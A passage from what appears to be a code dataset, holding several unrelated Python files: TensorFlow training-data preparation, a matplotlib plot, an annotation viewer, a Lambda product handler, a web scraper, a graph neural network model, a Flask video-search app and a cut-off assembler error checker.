'w') as f:\n for label in labels:\n f.write('item { \\n')\n f.write('\\tname:\\'{}\\'\\n'.format(label['name']))\n f.write('\\tid:{}\\n'.format(label['id']))\n f.write('}\\n')\n\nos.system(f'python {common_config.SCRIPTS_PATH}/generate_tfrecord.py -x {common_config.IMAGE_PATH}/train -l {common_config.ANNOTATION_PATH}/label_map.pbtxt -o {common_config.ANNOTATION_PATH}/train.record')\nos.system(f'python {common_config.SCRIPTS_PATH}/generate_tfrecord.py -x {common_config.IMAGE_PATH}/test -l {common_config.ANNOTATION_PATH}/label_map.pbtxt -o {common_config.ANNOTATION_PATH}/test.record')\n\nos.system(f'wget 
{common_config.model_config[\"pretrained_model_url\"]} -P {common_config.PRETRAINED_MODEL_PATH}')\n\ncompressed_pretrained_model = glob.glob(f'{common_config.PRETRAINED_MODEL_PATH}/*.tar.gz')[0]\nshutil.unpack_archive(compressed_pretrained_model, extract_dir=common_config.PRETRAINED_MODEL_PATH)\nos.remove(compressed_pretrained_model)\n\npretrained_model_name = next(os.scandir(common_config.PRETRAINED_MODEL_PATH)).name\n\nif os.path.exists(common_config.MODEL_PATH) and os.getenv('CLEAN_UP_WORKSPACE') == '1':\n shutil.rmtree(common_config.MODEL_PATH)\n\nif not os.path.exists(common_config.MODELS_PATH):\n os.mkdir(common_config.MODELS_PATH)\n\nif not os.path.exists(common_config.MODEL_PATH):\n os.mkdir(common_config.MODEL_PATH)\n\nCONFIG_PATH = f'{common_config.PRETRAINED_MODEL_PATH}/{pretrained_model_name}/pipeline.config'\n\nshutil.copy(CONFIG_PATH, common_config.MODEL_PATH)\n\n\n\nimport tensorflow as tf\nfrom object_detection.utils import config_util\nfrom object_detection.protos import pipeline_pb2\nfrom google.protobuf import text_format\n\npipeline_config = pipeline_pb2.TrainEvalPipelineConfig()\nwith tf.io.gfile.GFile(common_config.CUSTOM_MODEL_CONFIG, \"r\") as f: \n proto_str = f.read() \n text_format.Merge(proto_str, pipeline_config) \n\npipeline_config.model.ssd.num_classes = len(labels)\npipeline_config.train_config.batch_size = common_config.model_config['train_batch_size']\npipeline_config.train_config.fine_tune_checkpoint = f'{common_config.PRETRAINED_MODEL_PATH}/{pretrained_model_name}/checkpoint/ckpt-0'\npipeline_config.train_config.fine_tune_checkpoint_type = \"detection\"\npipeline_config.train_input_reader.label_map_path= f'{common_config.ANNOTATION_PATH}/label_map.pbtxt'\npipeline_config.train_input_reader.tf_record_input_reader.input_path[:] = [f'{common_config.ANNOTATION_PATH}/train.record']\npipeline_config.eval_input_reader[0].label_map_path = f'{common_config.ANNOTATION_PATH}/label_map.pbtxt'\npipeline_config.eval_input_reader[0].tf_record_input_reader.input_path[:] = [f'{common_config.ANNOTATION_PATH}/test.record']\n\nconfig_text = text_format.MessageToString(pipeline_config)\nwith tf.io.gfile.GFile(common_config.CUSTOM_MODEL_CONFIG, \"wb\") as f: \n f.write(config_text)\n\nwith open(f'/train.sh', 'w') as f:\n f.write(f'python {common_config.APIMODEL_PATH}/research/object_detection/model_main_tf2.py '\n f'--model_dir={common_config.MODEL_PATH} '\n f'--pipeline_config_path={common_config.CUSTOM_MODEL_CONFIG} '\n f'--num_train_steps={common_config.model_config[\"num_train_steps\"]}')","repo_name":"MadLadLabs/TensorflowObjectDetectionApiTrainingInDocker","sub_path":"src/prepare_training_data_set.py","file_name":"prepare_training_data_set.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"2032916977","text":"#使用scatter()绘制散点图并设置其样式\nimport matplotlib.pyplot as plt\n#通过x轴的数据自动计算y轴的数据值\nx_values = list(range(1,1001))\ny_values = [x**2 for x in x_values]\n\"\"\"\n数据点默认为蓝色的点黑色的轮廓,edgecolor选项可讲黑色的轮廓删除,从而就只剩蓝色的实心点了\nc选项设置颜色,可直接指定颜色名称或者用自定义颜色c=(0,0,0.8)\nc设置成一个数值y值列表,再设置cmap参数告诉pyplot使用哪个颜色映射\n\"\"\"\nplt.scatter(x_values,y_values,c=y_values,cmap=plt.cm.BuPu,edgecolor='none',s=10)\n#设置图标题并给坐标轴加上标签\nplt.title(\"Square Numbers\",fontsize=24)\nplt.xlabel(\"Value\",fontsize=14)\nplt.ylabel(\"Square of 
Value\",fontsize=14)\n#设置刻度标记的大小,x、y轴都影响只显示主刻度\nplt.tick_params(axis='both',which='major',labelsize=20)\n#设置x,y坐标的取值范围\nplt.axis([0,1000,0,1000000])\n#plt.show()\nplt.savefig('squares_plot.png',bbox_inches='tight')","repo_name":"wanqiangliu/python","sub_path":"matplotlib/scatter_squares.py","file_name":"scatter_squares.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34565174592","text":"from scipy.io import loadmat, savemat\nimport numpy as np\nimport imageio\nimport os\nimport cv2\nfrom PIL import Image\n\npth = \"rosbag_reader\\\\test\"\nmat_pth = \"rosbag_reader\\\\test\\\\joint_test_data_with_depth.mat\"\nannot_data = loadmat(mat_pth)\njoints = annot_data['joint_uvd']\nprint(joints.shape)\n# print(joints)\n\n# jnt = []\n# batch = []\n# annot = []\n\n# data = annot_data['joint_uvd']\n# if data.shape[0] == 1 and data.shape[1] > 0:\n# for i in range(data.shape[1]):\n# if i < 68:\n# batch.append(data[0,i,:,:])\n\nfor sample_index in range(69, joints.shape[1]):\n print(sample_index)\n kpanno = joints[0, sample_index, :, :]\n imagefile = 'rgb_1_'+ str(sample_index+1).zfill(7) +'.jpg'\n image_RGB = imageio.imread(os.path.join(pth, imagefile))\n\n image = np.zeros_like(image_RGB)\n image[:,:,0] = image_RGB[:,:,-1]\n image[:,:,1] = image_RGB[:,:,1]\n image[:,:,2] = image_RGB[:,:,0]\n # if sample_index > 67:\n # orig_image = cv2.resize(image_RGB, dsize=(480, 480), interpolation=cv2.INTER_CUBIC)\n # im = Image.fromarray(np.asanyarray(orig_image).astype('uint8'))\n # im.save(\"bigger/rgb_1_\"+ str(sample_index+1).zfill(7) +'.jpg')\n\n for i in range(kpanno.shape[0]):\n x = kpanno[i, 0]\n y = kpanno[i, 1]\n image = cv2.circle(image, (int(x), int(y)), 5, (0,0,255), 2)\n # if sample_index > 67:\n # jnt.append(np.array([int((x*1.875)), int(y*1.875), 1]))\n\n # if sample_index > 67:\n # batch.append(np.array(jnt))\n # jnt = []\n cv2.imshow('Annotaded image', image)\n cv2.waitKey(0)\n# annot = [np.array(batch)]\n# savemat('joint_data_test.mat', {'joint_uvd': np.array(annot)})","repo_name":"bordac6/DiplomovaPraca","sub_path":"codes/annotator/readMat.py","file_name":"readMat.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6201720442","text":"menu = ['osh' , 'qazonkabob', 'shashlik' , 'norin','somsa']\nbuyurtmalar = ['osh' , 'somsa', 'manti' , 'shashlik']\n\nif buyurtmalar:\n for taom in buyurtmalar:\n if taom in menu:\n print(f\" Menuda {taom} bor. \")\n else:\n print(f\"Kechirasiz , menuda {taom} yo'q.\")\n\nelse:\n print(\"Savatchangiz bo'sh. 
\")\n\ninput()\n","repo_name":"RuzimovJavlonbek/anvar.nazrullayevning-mohirdev.uz-platformasidagi-dasturlash.asoslari.python-kursidagi-amaliyotlar","sub_path":"sariq_dev/darslar/11_dars_urganish_7_.py","file_name":"11_dars_urganish_7_.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"39601451766","text":"import base64\nimport json\nimport logging\nimport os\nimport uuid\nfrom decimal import Decimal\n\nimport boto3\n\nfrom entities.product import Product\nfrom facades.product_facade import ProductFacade\nfrom repositories.product_dynamodb_repository import ProductDynamodbRepository\nfrom repositories.product_s3_repository import ProductS3Repository\nfrom services.product_service import ProductService\n\nproduct_dynamodb_repository: ProductDynamodbRepository = ProductDynamodbRepository()\nproduct_s3_repository: ProductS3Repository = ProductS3Repository()\nproduct_service: ProductService = ProductService(\n product_dynamodb_repository, product_s3_repository\n)\nproduct_facade: ProductFacade = ProductFacade(product_service)\n\n\ndef get_headers():\n return {\n \"Access-Control-Allow-Headers\": \"*\",\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Methods\": \"*\"\n }\n\ndef insert_handler(event, context):\n body = json.loads(event[\"body\"])\n\n extension = os.path.splitext(body[\"fileName\"])[1]\n\n product_id = str(uuid.uuid4())\n product_dict = {\n \"Id\": product_id,\n \"Name\": body[\"name\"],\n \"Rating\": str(body[\"rating\"]),\n \"Author\": body[\"author\"],\n \"Price\": str(body[\"price\"]),\n \"FileName\": product_id + extension,\n }\n\n base64_image = body.get(\"filebase64\")\n if base64_image:\n image = base64.b64decode(base64_image)\n\n product = Product(\n product_id,\n product_dict.get(\"Name\"),\n product_dict.get(\"Author\"),\n product_dict.get(\"Rating\"),\n product_dict.get(\"Price\"),\n product_dict.get(\"FileName\"),\n )\n\n product_facade.create(product, image)\n\n response = {\n 'statusCode': 200,\n 'headers': get_headers(),\n 'body': json.dumps(f\"Product inserted successfully {product}!\")\n }\n\n return response\n\n\ndef update_handler(event, context):\n body = json.loads(event[\"body\"])\n\n product_id = body.get(\"Id\")\n file_name = body.get(\"file_name\")\n\n product_dict = {\n \"Id\": product_id,\n \"Name\": body[\"name\"],\n \"Rating\": str(body[\"rating\"]),\n \"Author\": body[\"author\"],\n \"Price\": str(body[\"price\"]),\n \"FileName\": file_name,\n }\n\n base64_image = body.get(\"filebase64\")\n if base64_image:\n image = base64.b64decode(base64_image)\n\n product = Product(\n product_id,\n product_dict.get(\"Name\"),\n product_dict.get(\"Author\"),\n product_dict.get(\"Rating\"),\n product_dict.get(\"Price\"),\n product_dict.get(\"FileName\"),\n )\n\n product_facade.update(product_id, product, image)\n\n response = {\n \"statusCode\": 200,\n 'headers': get_headers(),\n \"body\": json.dumps(f\"Product updated successfully {product}!\"),\n }\n\n return response\n\n\ndef delete_handler(event, context):\n body = json.loads(event[\"body\"])\n\n product_id = body[\"Id\"]\n\n product_facade.delete(product_id)\n\n response = {\n \"statusCode\": 200,\n 'headers': get_headers(),\n \"body\": json.dumps(f\"Product deleted successfully {product_id}!\"),\n }\n\n return 
response\n","repo_name":"Jokebede-Coimbra/ProjetoPython","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"46376886494","text":"import csv\nimport requests\nfrom bs4 import BeautifulSoup as BS\n\n\n\nHOST = 'https://www.kivano.kg/'\n\ndef get_html(url):\n response = requests.get(url)\n return(response.text)\n\ndef get_total_pages(html):\n soup = BS(html, 'lxml')\n pages_ul = soup.find('div', class_= \"pager-wrap\").find('ul')\n last_page = pages_ul.find_all('li') [-1]\n total_page = last_page.find('a').get('href').split('=')[-1]\n return int(total_page)\n\ndef write_to_csv(data):\n with open('kivano_notebooks.csv', 'a') as csv_file:\n writer = csv.writer(csv_file, delimiter='/')\n writer.writerow((data['title'], \n data['price'],\n data['photo']))\n\ndef get_page_data(html):\n soup = BS(html, 'lxml')\n product_list = soup.find('div', class_=\"list-view\")\n products = product_list.find_all('div', class_=\"item product_listbox oh\")\n\n for product in products:\n try:\n \n photo = HOST + product.find('div', class_=\"listbox_img pull-left\").find('a').find('img').get('src')\n\n except:\n photo = ''\n\n try:\n title = product.find('div', class_='listbox_title oh').find('a').text\n \n except:\n title = ''\n try:\n price = product.find('div', class_='listbox_price text-center').find('strong').text\n \n except:\n price = ''\n\n data = {'title': title, 'price': price, 'photo': photo}\n write_to_csv(data)\n\n\ndef main():\n notebook_url = 'https://www.kivano.kg/noutbuki'\n pages = '?page='\n \n total_pages = get_total_pages(get_html(notebook_url))\n \n for page in range(1, total_pages+1):\n url_with_page = notebook_url + pages + str(page)\n html = get_html(url_with_page)\n get_page_data(html)\n\n\n\nmain() \n\n","repo_name":"azatdauletov/parsing","sub_path":"parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23027974318","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl.nn.pytorch.conv import RelGraphConv\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nimport os\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\n\n\"\"\"\nhttps://docs.dgl.ai/tutorials/models/1_gnn/4_rgcn.html#sphx-glr-tutorials-models-1-gnn-4-rgcn-py\n\"\"\"\n\n\ndef model_from_hparams(hparams, verbose=True):\n \"\"\"\n Just interfacing to create a model directly from an hparam file\n :param hparams:\n :return:\n \"\"\"\n num_rels = hparams.get('argparse', 'num_edge_types')\n model = Model(dims=hparams.get('argparse', 'embedding_dims'),\n self_loop=hparams.get('argparse', 'self_loop'),\n conv_output=hparams.get('argparse', 'conv_output'),\n num_rels=num_rels,\n num_bases=-1,\n similarity=hparams.get('argparse', 'similarity'),\n verbose=verbose)\n return model\n\n\nclass Embedder(nn.Module):\n\n def __init__(self,\n dims,\n num_rels=19,\n num_bases=-1,\n conv_output=False,\n self_loop=False,\n verbose=True):\n super(Embedder, self).__init__()\n self.dims = dims\n self.conv_output = conv_output\n self.num_rels = num_rels\n self.num_bases = num_bases\n self.self_loop = self_loop\n self.verbose = verbose\n\n self.layers = self.build_model()\n if self.verbose:\n print(self.layers)\n print(\"Num rels: \", self.num_rels)\n\n def build_model(self):\n layers = 
nn.ModuleList()\n\n short = self.dims[:-1]\n last_hidden, last = self.dims[-2:]\n if self.verbose:\n print(\"short, \", short)\n print(\"last_hidden, last \", last_hidden, last)\n\n # input feature is just node degree\n i2h = self.build_hidden_layer(1, self.dims[0])\n layers.append(i2h)\n\n for dim_in, dim_out in zip(short, short[1:]):\n # print('in',dim_in, dim_out)\n h2h = self.build_hidden_layer(dim_in, dim_out)\n layers.append(h2h)\n # hidden to output\n h2o = self.build_output_layer(last_hidden, last)\n # print('last',last_hidden,last)\n layers.append(h2o)\n return layers\n\n @property\n def current_device(self):\n \"\"\"\n :return: current device this model is on\n \"\"\"\n return next(self.parameters()).device\n\n def build_hidden_layer(self, in_dim, out_dim):\n return RelGraphConv(in_dim, out_dim, self.num_rels,\n num_bases=self.num_bases,\n activation=F.relu,\n self_loop=self.self_loop)\n\n # No activation for the last layer\n def build_output_layer(self, in_dim, out_dim, conv=False):\n if self.conv_output:\n return RelGraphConv(in_dim, out_dim,\n self.num_rels,\n num_bases=self.num_bases,\n self_loop=self.self_loop,\n activation=None)\n else:\n return nn.Linear(in_dim, out_dim)\n\n def forward(self, g):\n # h = g.in_degrees().view(-1, 1).float().to(self.current_device)\n h = torch.ones(len(g.nodes())).view(-1, 1).to(self.current_device)\n for i, layer in enumerate(self.layers):\n # layer(g)\n if not self.conv_output and (i == len(self.layers) - 1):\n h = layer(h)\n else:\n h = layer(g, h, g.edata['one_hot'])\n g.ndata['h'] = h\n return g.ndata['h']\n\n\n###############################################################################\n# Define full R-GCN model\n# ~~~~~~~~~~~~~~~~~~~~~~~\n\nclass Model(nn.Module):\n def __init__(self,\n dims,\n num_rels,\n num_bases=-1,\n conv_output=True,\n self_loop=False,\n hard_embed=False,\n similarity=True,\n normalize=False,\n weighted=False,\n verbose=True):\n \"\"\"\n\n :param dims: the embeddings dimensions, a list of type [128,128,32]\n :param attributor_dims: the number of motifs to look for\n :param num_rels: the number of possible edge types\n :param num_bases: technical rGCN option\n\n :param rec: the constant in front of reconstruction loss\n :param mot: the constant in front of motif detection loss\n :param orth: the constant in front of dictionary orthogonality loss\n :param scaled: if we want to scale the loss by attribution norm\n :param similarity: if we want to use cosine similarities instead of distances everywhere\n\n :param attribute: Whether we want the network to use the attribution module\n :param convolute: If we want to use a rgcn also for the attributions\n\n \"\"\"\n super(Model, self).__init__()\n self.verbose = verbose\n self.dims = dims\n self.dimension_embedding = dims[-1]\n\n self.num_rels = num_rels\n self.num_bases = num_bases\n\n self.similarity = similarity\n self.normalize = normalize\n self.weighted = weighted\n self.self_loop = self_loop\n\n # create rgcn layers for the embedder\n self.embedder = Embedder(dims=dims,\n num_rels=num_rels,\n num_bases=num_bases,\n self_loop=self_loop,\n conv_output=conv_output,\n verbose=verbose)\n\n def forward(self, g):\n # If hard embed, the embeddings are directy g.ndata['h'], otherwise we compute them and put them here\n self.embedder(g)\n\n # If using similarity as a supervision, we should normalize the embeddings, as their norm got unconstrained\n if self.similarity and self.normalize:\n g.ndata['h'] = F.normalize(g.ndata['h'], p=2, dim=1)\n return g.ndata['h']\n\n 
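# Editor's addition (illustrative sketch only, not part of the original vernal repo):\n # a standalone helper mirroring the two pairwise comparisons used in rec_loss below.\n @staticmethod\n def pairwise_matrix(embeddings, similarity=True):\n # cosine-style supervision uses a Gram matrix; otherwise pairwise L2 distances\n if similarity:\n return torch.mm(embeddings, embeddings.t())\n return torch.norm(embeddings[:, None] - embeddings, dim=2, p=2)\n\n 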
@property\n def current_device(self):\n \"\"\"\n :return: current device this model is on\n \"\"\"\n return next(self.parameters()).device\n\n # Below are loss computation function related to this model\n @staticmethod\n def matrix_cosine(a, b, eps=1e-8):\n \"\"\"\n added eps for numerical stability\n \"\"\"\n a_n, b_n = a.norm(dim=1)[:, None], b.norm(dim=1)[:, None]\n a_norm = a / torch.max(a_n, eps * torch.ones_like(a_n))\n b_norm = b / torch.max(b_n, eps * torch.ones_like(b_n))\n sim_mt = torch.mm(a_norm, b_norm.transpose(0, 1))\n return sim_mt\n\n @staticmethod\n def matrix_dist(a, plus_one=False):\n \"\"\"\n Pairwise dist of a set of a vector of size b\n returns a matrix of size (a,a)\n :param a : a torch Tensor of size a,b\n :param plus_one: if we want to get positive values\n \"\"\"\n if plus_one:\n return torch.norm(a[:, None] - a, dim=2, p=2) + 1\n return torch.norm(a[:, None] - a, dim=2, p=2)\n\n @staticmethod\n def weighted_MSE(output, target, weight):\n if weight is None:\n return torch.nn.MSELoss()(output, target)\n return torch.mean(weight * (output - target) ** 2)\n\n def rec_loss(self, embeddings, target_K, graph=None):\n \"\"\"\n :param embeddings: The node embeddings\n :param target_K: The similarity matrix\n :return:\n \"\"\"\n if self.similarity:\n if self.normalize:\n K_predict = self.matrix_cosine(embeddings, embeddings)\n else:\n K_predict = torch.mm(embeddings, embeddings.t())\n\n else:\n K_predict = self.matrix_dist(embeddings)\n target_K = torch.ones(target_K.shape, device=target_K.device) - target_K\n\n if self.weighted:\n assert graph is not None\n import networkx as nx\n nx_graph = graph.to_networkx(edge_attrs=['one_hot'])\n nx_graph = nx.to_undirected(nx_graph)\n ordered = sorted(nx_graph.nodes())\n adj_matrix_full = nx.to_scipy_sparse_matrix(nx_graph, nodelist=ordered)\n\n # copy the matrix with only the non canonical\n extracted_edges = [(u, v) for u, v, e in nx_graph.edges.data('one_hot', default='0')\n if e not in [0, 6]]\n extracted_graph = nx.Graph()\n extracted_graph.add_nodes_from(ordered)\n extracted_graph.add_edges_from(extracted_edges)\n extracted_graph = nx.to_undirected(extracted_graph)\n adj_matrix_small = nx.to_scipy_sparse_matrix(extracted_graph, nodelist=ordered)\n\n # This is a matrix with non zero entries for non canonical relationships\n # One must then expand it based on the number of hops\n adj_matrix_full = np.array(adj_matrix_full.todense())\n adj_matrix_small = np.array(adj_matrix_small.todense())\n\n expanded_connectivity = [np.eye(len(adj_matrix_full))]\n for _ in self.dims[:-1]:\n expanded_connectivity.append(expanded_connectivity[-1] @ adj_matrix_full)\n expanded_connectivity = np.sum(expanded_connectivity, axis=0)\n\n # What we are after is a matrix for which you start with a walk of len < max_len\n # that starts with node i and that ends with a non canonical with j\n # ie : all neighborhoods that include a non canonical.\n # multiplying on the left yields walks that start with a non canonical on the rows\n # expanded_connectivity_left = np.array(adj_matrix_small @ expanded_connectivity)\n expanded_connectivity_right = np.array(expanded_connectivity @ adj_matrix_small)\n enhanced = np.sum(expanded_connectivity_right, axis=0)\n enhanced = np.clip(enhanced, a_min=0, a_max=1)\n fraction = np.sum(enhanced) / len(enhanced)\n enhanced = ((1 / (fraction + 0.005)) * enhanced) + 1\n weight = np.outer(enhanced, enhanced)\n weight /= np.mean(weight)\n weight = torch.from_numpy(weight)\n return self.weighted_MSE(K_predict, target_K, 
weight)\n\n reconstruction_loss = torch.nn.MSELoss()(K_predict, target_K)\n return reconstruction_loss\n","repo_name":"cgoliver/vernal","sub_path":"train_embeddings/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10431,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"71462710808","text":"from flask import Flask, request, send_from_directory, jsonify\nfrom flask_cors import CORS\nimport os\nimport boto3\nimport uuid\nimport cv2\nimport tempfile\nimport shutil\nimport json\nimport torch\nfrom PIL import Image\nimport clip\nimport pinecone\n\napp = Flask(__name__, static_folder='../panoptes-ui/build')\nindex = pinecone.Index(\"panoptes-frame-vectors-shadow\")\nmodel, preprocess = clip.load(\"ViT-B/32\", device=\"cpu\")\nmodel_obj = {\"model\": model, \"preprocess_fn\": preprocess}\nCORS(app)\n\ndef invoke_sagemaker_endpoint(bucket_name, video_name, user_id):\n try:\n endpoint_name = \"clip-inference-endpoint\"\n payload = json.dumps({\n \"bucket_name\": 'user-1234',\n \"user_id\": user_id})\n\n # invoke_endpoint lives on the 'sagemaker-runtime' client, not 'sagemaker'\n sagemaker_runtime_client = boto3.client('sagemaker-runtime')\n response = sagemaker_runtime_client.invoke_endpoint(\n EndpointName=endpoint_name,\n ContentType='application/json',\n Body=payload\n )\n result = json.loads(response['Body'].read().decode())\n except:\n print(\"ZzzZ\")\n return \"Executed\"\n\n@app.route('/generate-userid', methods=['GET'])\ndef generate_user_id():\n user_id = str(uuid.uuid4())\n return {'success': True, 'userId': user_id}\n\n@app.route('/create-bucket', methods=['POST'])\ndef create_bucket():\n user_id = request.json.get('userId')\n if not user_id:\n return {'success': False, 'message': 'User ID is required'}\n \n s3 = boto3.client('s3', \n region_name='us-east-1', \n aws_access_key_id='############', \n aws_secret_access_key='############')\n\n bucket_name = 'user-' + user_id\n s3.create_bucket(Bucket=bucket_name)\n return {'success': True, 'bucketName': bucket_name}\n\n@app.route('/indexvideo', methods=['POST'])\ndef upload_file():\n s3 = boto3.client('s3', \n region_name='us-east-1', \n aws_access_key_id='###########', \n aws_secret_access_key='##########')\n \n file = request.files['file']\n bucket_name = request.form['bucketName']\n\n if file:\n try:\n temp_dir = tempfile.mkdtemp()\n file_path = os.path.join(temp_dir, file.filename)\n file.save(file_path)\n video = cv2.VideoCapture(file_path)\n frame_rate = video.get(cv2.CAP_PROP_FPS)\n frame_num = 0\n print(\"Frame Rate :\", frame_rate)\n while True:\n ret, frame = video.read()\n if ret:\n if frame_num % frame_rate == 0:\n frame_file = os.path.join(temp_dir, f'frame_{frame_num:04d}.jpg')\n cv2.imwrite(frame_file, frame)\n with open(frame_file, 'rb') as data:\n s3.upload_fileobj(data, bucket_name, f'images_{file.filename}/frame_{frame_num:04d}.jpg')\n frame_num += 1\n else:\n break\n video.release()\n shutil.rmtree(temp_dir)\n _ = invoke_sagemaker_endpoint(bucket_name, file.name, str(uuid.uuid4()))\n return {\"success\": True}\n except Exception as e:\n return {\"success\": False, \"message\": str(e)}\n\n return {\"success\": False, \"message\": \"No file provided\"}\n\n@app.route('/search', methods=['POST'])\ndef search():\n data = request.get_json()\n query = data.get('query')\n query_tokens = clip.tokenize([query]).to(\"cpu\")\n\n with torch.no_grad():\n query_features = model.encode_text(query_tokens)\n query_features = query_features.cpu().numpy().tolist()[0]\n\n query_response = index.query(\n 
namespace='user-5ce111fe-7ac9-4bdc-8f47-93fe84d5ac0a',\n top_k=5,\n include_metadata=True,\n vector=query_features,\n filter={\n 'video': {'$in': ['images_10secsimple_cup_beach.mp4']}\n }\n )\n\n print(query_response)\n\n timestamps = [int(id) for id in query_response.ids]\n return jsonify({\"timestamps\": timestamps, \"status\": 200})\n\n@app.route('/', defaults={'path': ''})\n@app.route('/')\ndef serve(path):\n if path != \"\" and os.path.exists(app.static_folder + '/' + path):\n return send_from_directory(app.static_folder, path)\n else:\n return send_from_directory(app.static_folder, 'index.html')\n\nif __name__ == '__main__':\n app.run(port=3001)","repo_name":"Vi-Sri/panoptes-service","sub_path":"panoptes-app/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74943015448","text":"def haltError(lst,linelist):\n if lst[-1]!=['hlt']:\n return 0,linelist[-1]\n for i in range(len(lst)-1):\n if lst[i]==['hlt']:\n return -1,linelist[i]\n return 1,0\n\n#print(haltError(lst))\ndef VarList(lst,varlist,linelist): #ins_l,[]\n i=0\n while lst[i][0]=='var':\n if len(lst[i])>2:\n return -1,linelist[i]\n varlist.append(lst[i][1])\n i+=1\n j=i\n for i in range(j,len(lst)):\n if lst[i][0]=='var':\n return -1,linelist[i]\n return 1,0\n\n\ndef Labellist(lst,labellist): #ins_l,[]\n i=0\n for i in range(len(lst)):\n # if len(lst[i])>1 and lst[i][1][-1]==\":\":\n # return -1\n if lst[i][0][-1]==\":\":\n labellist.append(lst[i][0][:-1])\n \n return 1,0\n \n\ndef UndefinedVariables(lst,varlist,labellist,linelist): #ins_l, varlist, labellist\n for i in range(len(lst)):\n if lst[i][0] in [\"ld\",\"st\"]:\n y=lst[i][-1]\n if y not in varlist and y not in labellist:\n return -1,linelist[i]\n elif y not in varlist and y in labellist:\n return 0,linelist[i]\n return 1,0\n \n \n \ndef UndefinedLabels(lst,varlist,labellist,linelist): #ins_l,varlist,labellist\n for i in range(len(lst)):\n if lst[i][0] in [\"jmp\",\"jgt\",\"je\",\"jlt\"]:\n y=lst[i][-1]\n if y not in labellist and y not in varlist:\n return -1,linelist[i]\n elif y not in labellist and y in varlist:\n return 0,linelist[i]\n return 1,0\n \n \ndef ImmediateError(lst,linelist): #insl_l\n for i in range(len(lst)):\n if lst[i][0]==\"mov\" and lst[i][2][0]==\"$\":\n if int(lst[i][2][1:])<0 or int(lst[i][2][1:])>255:\n return -1,linelist[i]\n elif lst[i][0] in [\"ls\",\"rs\"]:\n if lst[i][2][0]!=\"$\":\n return 0,linelist[i]\n elif int(lst[i][2][1:])<0 or int(lst[i][2][1:])>255:\n return -1,linelist[i]\n return 1,0\n\ndef IllegalFlag(lst,linelist): #insl_l\n for i in range(len(lst)):\n if lst[i][0] in [\"add\",\"sub\",\"mul\",\"xor\",\"or\",\"and\"]:\n if lst[i][1]==\"FLAGS\" or lst[i][2]==\"FLAGS\" or lst[i][3]==\"FLAGS:\":\n return -1,linelist[i]\n elif lst[i][0] in [\"cmp\",\"not\",\"div\"]:\n if lst[i][1]==\"FLAGS\" or lst[i][2]==\"FLAGS\":\n return -1,linelist[i]\n elif lst[i][0] in [\"mov\",\"ld\",\"st\",\"rs\",\"ls\"]:\n if lst[i][1]==\"FLAGS\":\n return -1,linelist[i]\n return 1,0\n\n\n\ndef is_valid_opcode(ins_l,linelist):\n\n #check if length is correct\n\n d=[' ','add','sub','mov','ld','st','mul','div','rs','ls',\n 'xor','or','and','not','cmp','jmp','jlt','jgt','je','hlt',\n 'var']\n\n for i in range(len(ins_l)):\n if (ins_l[i][0][-1]==\":\"):\n continue\n elif ins_l[i][0] not in d:\n return -1,linelist[i]\n \n return 1,0\n\n\ndef error_len(ins_l,linelist):\n\n 
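# Editor's hedged note: each count in the table below includes the mnemonic itself,\n # e.g. ['add','R1','R2','R3'] has length 4; a mismatch returns (-1, source_line).\n 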
d={'add':4,'sub':4,'mov':3,'ld':3,'st':3,'mul':4,'div':3,'rs':3,'ls':3,'xor':4,'or':4,'and':4,\n 'not':3,'cmp':3,'jmp':2,'jlt':2,'jgt':2,'je':2,'hlt':1,'var':2}\n\n for i in range(len(ins_l)):\n if (ins_l[i][0][-1]==\":\"):\n continue\n if (len(ins_l[i])!=d[ins_l[i][0]]):\n # print(i)\n return -1,linelist[i]\n \n return 1,0\n\n\ndef reg_error_l1(l1):\n\n # is it between R0 and R6\n #the first letter is a R and not a,b,c,d or r\n\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n\n reg=l1[1]\n\n\n if (reg not in regl):\n return -1\n\n return 1\n\ndef reg_error_l2(l2):\n\n reg1=l2[1]\n reg2=l2[2]\n\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n if (reg1 not in regl) or (reg2 not in regl):\n return -1\n\n return 1\n \n\ndef reg_error_l3(l3):\n\n reg1=l3[1]\n reg2=l3[2]\n reg3=l3[3]\n\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n \n if (reg1 not in regl) or (reg2 not in regl) or (reg3 not in regl):\n return -1\n\n return 1\n\ndef check_mov(l,linelist):\n\n if (l[-1][0]=='$' and l[0][0]!='$'):\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n\n reg=l[0]\n fc=reg[0]\n if (reg not in regl):\n return -1\n \n return 1\n\n elif (l[0][0]=='$'):\n return -1 \n\n else:\n\n regl=['R0','R1','R2','R3','R4','R5','R6','FLAGS']\n\n reg1=l[0]\n reg2=l[1]\n\n fc1=reg1[0]\n fc2=reg2[0]\n if (reg1 not in regl) or (reg2 not in regl):\n return -1\n \n return 1\n\ndef syntax_error(ins_l,linelist):\n\n l1=[]\n l2=[]\n l3=[]\n\n d3=['add','sub','mul','xor','or','and']\n d2=['div','not','cmp']\n d1=['ls','rs','ld','st']\n\n for i in 